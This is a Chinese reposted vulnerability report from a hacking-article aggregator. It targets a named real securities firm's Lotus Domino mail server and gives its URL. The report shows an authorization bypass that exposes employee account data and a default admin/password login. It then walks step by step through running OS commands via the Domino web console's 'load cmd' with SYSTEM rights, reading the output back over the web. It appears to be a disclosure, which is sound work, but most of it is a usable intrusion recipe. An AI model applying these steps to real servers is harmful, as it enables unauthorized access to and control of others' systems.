记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

海通证券某系统越权+弱口令(附lotus domino执行命令方法)

2014-11-26 23:10

http://ib.htsec.com/ 通证券上海投资银行部邮件系统

存在越权,访问

http://ib.htsec.com/names.nsf/$users 即可获取员工账户信息

越权.jpg





存在默认口令admin/password

登录后跳转到一个错误页面,手工访问http://ib.htsec.com/webadmin.nsf即可

webadmin.jpg



如果提示浏览器不支持DFC框架,请更换IE6或者低版本的火狐浏览器

我们记下这个路径d:\Lotus\Domino\data

然后选择"Server"-"Status"-"Quick console"

输入命令

load cmd /c net user > d:\Lotus\Domino\data\domino\html\download\filesets\netuser1.txt

执行命令.jpg



执行后访问

http://ib.htsec.com/download/filesets/netuser1.txt即可看到执行结果

netuser.jpg



并且是system权限

whoami.jpg

漏洞证明:

见详细说明

修复方案:

增强密码复杂性


知识来源: www.wooyun.org/bugs/wooyun-2014-079095

阅读:1141845 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“海通证券某系统越权+弱口令(附lotus domino执行命令方法)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

广而告之 💖

标签云 ☁